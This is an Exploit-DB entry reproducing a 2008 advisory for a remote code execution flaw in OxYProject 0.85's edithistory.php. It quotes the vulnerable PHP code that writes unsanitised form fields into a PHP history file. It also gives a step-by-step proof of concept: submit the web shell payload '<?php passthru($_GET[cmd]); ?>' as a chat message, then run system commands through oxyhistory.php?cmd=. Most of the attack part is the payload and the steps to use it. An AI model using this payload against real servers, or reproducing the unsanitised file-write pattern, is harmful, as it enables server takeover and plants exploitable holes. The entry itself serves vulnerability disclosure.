OxYProject 0.85 - 'edithistory.php' Remote Code Execution

EDB-ID:

5524

CVE:

2008-6651

EDB Verified:

Author:

GoLd_M

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-04-30

Vulnerable App:

OxYProject 0.85 (edithistory.php) Remote Code Execution Vulnerability
Script : http://puzzle.dl.sourceforge.net/sourceforge/oxyproject/OxYBox085uns.zip
Code Vuln  :
###################Ln 24###################
include('oxycfg.php');

//########################################
//	Editing the Chat History
//########################################

$edit_file = $file['Chat_History'];
$fh = fopen($edit_file, 'a') or die("<meta http-equiv=\"refresh\" content=\"1 ;url=oxybox_submit.php\"><font face=\"arial\">Error occured when submitting your message. <a href=\"javascript: history.go(-1)\">Back</a></font>");
fwrite($fh, "<b><font face=\"arial\" color=" . $_POST["usercolor"] . ">" . $_POST["oxyname"] . " :</font></b> <font color=" . $_POST["msgcolor"] . ">" . $_POST["oxymsg"] . "</font><br>");
fclose($fh);
###################Ln 33###################
In The Page "oxycfg.php"
###################Ln 33###################
$file['Chat_History'] = "oxyhistory.php";
###################Ln 23###################
POC :
Go :-> http://localhost/1/OxYBox085uns/0.85/edithistory.php 
You'll see In this Page
Username [?]                      Your message has been successfully submitted [X]
              Your Message Here
Username Color [?]  black     Enter Message
In The "Username" Write "Gold_M" 
In The "Your Message Here" Write This Code "<?php passthru($_GET[cmd]); ?>"
Afte All this Click  "Enter Message"
Now Go :-> http://localhost/OxYBox085uns/0.85/oxyhistory.php?cmd=dir
# Thanx To TryagOxY

# milw0rm.com [2008-04-30]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services